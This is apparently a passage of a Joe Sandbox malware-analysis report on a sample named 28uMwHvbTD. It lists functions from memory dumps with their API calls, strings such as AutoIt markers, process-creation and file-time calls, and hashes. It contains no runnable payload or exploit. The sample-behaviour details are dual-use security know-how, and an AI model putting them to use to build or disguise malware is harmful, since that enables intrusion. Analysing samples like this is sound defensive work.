Part of subcall function 0074407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00744160

KillTimer.USER32(?,00000001,?,?), ref: 00744524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00744533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0077D4B9

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: d3be231cb2908ca6e4ef889e4aca42cb02346334297c1c331c5c7607e59808d8
Instruction ID: da8a6404661ea706e46d4a43052455fcaef3238cb93d3cefac05de49b55d7bdc
Opcode Fuzzy Hash: d3be231cb2908ca6e4ef889e4aca42cb02346334297c1c331c5c7607e59808d8
Instruction Fuzzy Hash: E021D470904784AFEB328B24D859BE7FBFCAF05354F04449DEA9E96182C3782E84DB51

Function 00744C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00744CBA

Strings

EA06, xrefs: 0077D8CC
AU3!P/}, xrefs: 00744CB4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/}$EA06
API String ID: 4104443479-3992199863
Opcode ID: 158130bc9fa95881ccf99b548a2a9a450d4094882717cc38a856ffcd23a5a019
Instruction ID: 43b60aba541280074f76f93d7932b7533aa70b362c3f7ce2aed0a6aed12bf737
Opcode Fuzzy Hash: 158130bc9fa95881ccf99b548a2a9a450d4094882717cc38a856ffcd23a5a019
Instruction Fuzzy Hash: E0417D21F04158ABDF219B648C957BE7BB2AF45300F284065EE829B282D73C5D44ABA1

Function 007A8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007A8DAC
__fread_nolock.LIBCMT ref: 007A8DC1

Strings

EA06, xrefs: 007A8DF3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: f0bc5d630cfd86fe1ea3aefaae0ce96396f687cd204098282e285eaf214320cd
Instruction ID: f7c6b4187c82c4f3e9acf4a54d4885bdd4854652d592e62ac6770f46c278fdf3
Opcode Fuzzy Hash: f0bc5d630cfd86fe1ea3aefaae0ce96396f687cd204098282e285eaf214320cd
Instruction Fuzzy Hash: 8B01F971904218BEDB58DBA8CC1AEFE7BF8DB15301F00419AF553D2281E879A60887A0

Function 00760DB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0076571C: __FF_MSGBANNER.LIBCMT ref: 00765733
Part of subcall function 0076571C: __NMSG_WRITE.LIBCMT ref: 0076573A
Part of subcall function 0076571C: RtlAllocateHeap.NTDLL(01260000,00000000,00000001), ref: 0076575F

std::exception::exception.LIBCMT ref: 00760DEC
__CxxThrowException@8.LIBCMT ref: 00760E01

Part of subcall function 0076859B: RaiseException.KERNEL32(?,?,00000000,007F9E78,?,00000001,?,?,?,00760E06,00000000,007F9E78,00749E8C,00000001), ref: 007685F0

Strings

bad allocation, xrefs: 00760DE1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: e6dc764dfa9dfcd2fae03debf615a46246b534b2abe20912e1a0875b07b7d175
Instruction ID: 5b6f57d733a6d7e1ba17fbe3b0e66c635b4e27cd4f6b3e67c8d1db51f9176cde
Opcode Fuzzy Hash: e6dc764dfa9dfcd2fae03debf615a46246b534b2abe20912e1a0875b07b7d175
Instruction Fuzzy Hash: FBF0283160031DA6CB10BAA4EC09ADF7BAC9F00311F10052AFD0A96282DF79DE41C2D2

Function 012FC490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 012FC4D5
ExitProcess.KERNEL32(00000000), ref: 012FC4F4

Strings

D, xrefs: 012FC4A1

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction ID: 76a55b94dce45870841e4b986bb8ecfa11f5330272aa23ec2d411649e80a200d
Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction Fuzzy Hash: BEF0FF7555424DABDB60EFE4CC49FFEB77CBF04701F008518FB0A9A180DA7496189BA5

Function 007A98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 007A98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007A990F

Strings

aut, xrefs: 007A9909

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 281e177172ec9446fadf79ef07c7e441a7cd4d8f48c2b99f5bb9f479674c03ec
Instruction ID: 0beee4c0a9fe54c48aeca31e63d7c8d40be6f914a5dd1fcc4a4a6ca1c2c2b7a8
Opcode Fuzzy Hash: 281e177172ec9446fadf79ef07c7e441a7cd4d8f48c2b99f5bb9f479674c03ec
Instruction Fuzzy Hash: 66D05E7A54030DABDB50ABA0DC0EFAEBB3CE704700F0042B1FB54921A1EAB495988B95

Function 007BCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d24a0060017686a1aa365eedbb50eb14f6e946cb89a29247f168ddc88fea439
Instruction ID: 86e8ff07a804950a2c5e4361b1e06cd97d792bca164bd59fca9cfbc0134838a8
Opcode Fuzzy Hash: 5d24a0060017686a1aa365eedbb50eb14f6e946cb89a29247f168ddc88fea439
Instruction Fuzzy Hash: 9FF13775608301DFCB14DF28C484A6ABBE5FF88314F14896EF9999B251D738E945CF82

Function 0074434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00744370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00744415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00744432

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 7538196fd215421f7150a8d24ff01fd82735d9ac1dafefaadc577a0afb0baceb
Instruction ID: 158a33d372dadec2cb84d599defec006834e8a41140191969cf17507fc9c2cbb
Opcode Fuzzy Hash: 7538196fd215421f7150a8d24ff01fd82735d9ac1dafefaadc577a0afb0baceb
Instruction Fuzzy Hash: 55318FB0505701CFD760DF24D88479BBBF8FF48708F00092EE59A92251E778A944DB92

Function 0076571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00765733

Part of subcall function 0076A16B: __NMSG_WRITE.LIBCMT ref: 0076A192
Part of subcall function 0076A16B: __NMSG_WRITE.LIBCMT ref: 0076A19C

__NMSG_WRITE.LIBCMT ref: 0076573A

Part of subcall function 0076A1C8: GetModuleFileNameW.KERNEL32(00000000,008033BA,00000104,00000000,00000001,00000000), ref: 0076A25A
Part of subcall function 0076A1C8: ___crtMessageBoxW.LIBCMT ref: 0076A308

Part of subcall function 0076309F: ___crtCorExitProcess.LIBCMT ref: 007630A5
Part of subcall function 0076309F: ExitProcess.KERNEL32 ref: 007630AE

Part of subcall function 00768B28: __getptd_noexit.LIBCMT ref: 00768B28

RtlAllocateHeap.NTDLL(01260000,00000000,00000001), ref: 0076575F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 8b7c4f90440e2881b5797bd9e8404c97ec0b297e35d00f741507606d1469b525
Instruction ID: c65f9f75ef7487c53b167c4b24eb068f8bb5030ddbe543d883ff0e7a18558e96
Opcode Fuzzy Hash: 8b7c4f90440e2881b5797bd9e8404c97ec0b297e35d00f741507606d1469b525
Instruction Fuzzy Hash: 7701B575240B05DBD6543735EC56A2E779C9B42762F100535FD1BAA1C2DF7C9C00A661

Function 007A98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007A9548,?,?,?,?,?,00000004), ref: 007A98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007A9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007A98D1
CloseHandle.KERNEL32(00000000,?,007A9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007A98D8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 1344cc9387740694b13f4144ecaaaabfc6d30ed7f2a65c77d076a2f994349ed5
Instruction ID: 9426b07e9687abe51c970ea254719b1d297972693222db2e91b97e8529689355
Opcode Fuzzy Hash: 1344cc9387740694b13f4144ecaaaabfc6d30ed7f2a65c77d076a2f994349ed5
Instruction Fuzzy Hash: B6E08632141218B7D7211B54EC09FCA7F1AAB46760F148225FB14690E087B55521979C

Function 007A8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007A8D1B

Part of subcall function 00762D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00769A24), ref: 00762D69
Part of subcall function 00762D55: GetLastError.KERNEL32(00000000,?,00769A24), ref: 00762D7B

_free.LIBCMT ref: 007A8D2C
_free.LIBCMT ref: 007A8D3E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: eda9186a7ac66ddc5832aade5dbddc9393b15484c3e11e3ff22c7faa01cfa98c
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 2DE012A1701A0186CBA4A678A944A9313DC5F9D3527140A1DB85EE7187DF6CF8438124

Function 0074A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0077FC01

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: c5a853d5009f61cc37aac0a5faea68c03dd9626be1bee752b41f04ae9739b116
Instruction ID: fae25e04467230da3b8fdb119134cb84606272792dbb752a4f2fcf9f1de06d76
Opcode Fuzzy Hash: c5a853d5009f61cc37aac0a5faea68c03dd9626be1bee752b41f04ae9739b116
Instruction Fuzzy Hash: ED225A70648301EFDB24DF24C494A6AB7E1FF85304F15896DE89A9B362D739EC45CB82

Function 00747A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00747AAB
_memmove.LIBCMT ref: 00747B16

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
Instruction ID: d28d47930f9b0f39262a73021f35cbc5f4f874ac55a92fe715465e7e0d2e77cf
Opcode Fuzzy Hash: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
Instruction Fuzzy Hash: 973184B1704606AFC718DF68D8D1D69B3A9FF48310715C629E919CB391EB38E950CB90

Function 007447D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

74BFC8D0.UXTHEME ref: 00744834

Part of subcall function 0076336C: __lock.LIBCMT ref: 00763372
Part of subcall function 0076336C: RtlDecodePointer.NTDLL(00000001), ref: 0076337E
Part of subcall function 0076336C: RtlEncodePointer.NTDLL(?), ref: 00763389

Part of subcall function 007448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00744915
Part of subcall function 007448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0074492A

Part of subcall function 00743B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00743B68
Part of subcall function 00743B3A: IsDebuggerPresent.KERNEL32 ref: 00743B7A
Part of subcall function 00743B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008052F8,008052E0,?,?), ref: 00743BEB
Part of subcall function 00743B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00743C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00744874

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
String ID:
API String ID: 2688871447-0
Opcode ID: 9388ba55f44afb732ecc1021450a6ca1f8fc0164e649fdf368d4d39397d33fd9
Instruction ID: 07c486fdbbf3691124c7f8344d7f92572431bd1c5ab6e9e7cfd8b09786dc63b8
Opcode Fuzzy Hash: 9388ba55f44afb732ecc1021450a6ca1f8fc0164e649fdf368d4d39397d33fd9
Instruction Fuzzy Hash: 7711A9719087059BC700EF29E84990FBBE8FF89750F00891EF440832B1DBB49A18CBA2

Function 007655FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0076562C
__lock_file.LIBCMT ref: 0076564D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 72ff724c8471e945cdf98f553550fe7814def1e7e53de476c4509828614d8dbe
Instruction ID: 9cb2911f9890b3e4429d24fce9441a16629dc75c815ec1c5b2144bc1407b9df5
Opcode Fuzzy Hash: 72ff724c8471e945cdf98f553550fe7814def1e7e53de476c4509828614d8dbe
Instruction Fuzzy Hash: 470120B1C00A08FBCF12AF64DC0A49E7B61AF50761F548215FC1617151DB7D8511FF52

Function 007653A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00768B28: __getptd_noexit.LIBCMT ref: 00768B28

__lock_file.LIBCMT ref: 007653EB

Part of subcall function 00766C11: __lock.LIBCMT ref: 00766C34

__fclose_nolock.LIBCMT ref: 007653F6

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: b781727f838256688c819fbf62edeab37f7342670bdefa15289a0566d4347fad
Instruction ID: d2bc98d7a1b6799348e33c35815cd57ecf4e30e758377539cbb1c71f4bab29a1
Opcode Fuzzy Hash: b781727f838256688c819fbf62edeab37f7342670bdefa15289a0566d4347fad
Instruction Fuzzy Hash: B1F0BB71900B04DADB516F7698097AD77E06F41778F248309AC26AB2C1DFFC5941BB52

Function 012FC500 Relevance: 1.7, APIs: 1, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 012FBD70: GetFileAttributesW.KERNELBASE(?), ref: 012FBD7B

CreateDirectoryW.KERNELBASE(?,00000000), ref: 012FC65C

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: e2e14ad2f8aad88fc96cbae81407ac55e9a1040f81b8cceecdceccfd6d61a591
Instruction ID: ade4eb03686a54ce393a522a3579c4b14a3c7ea9814938d272663fefe75f7901
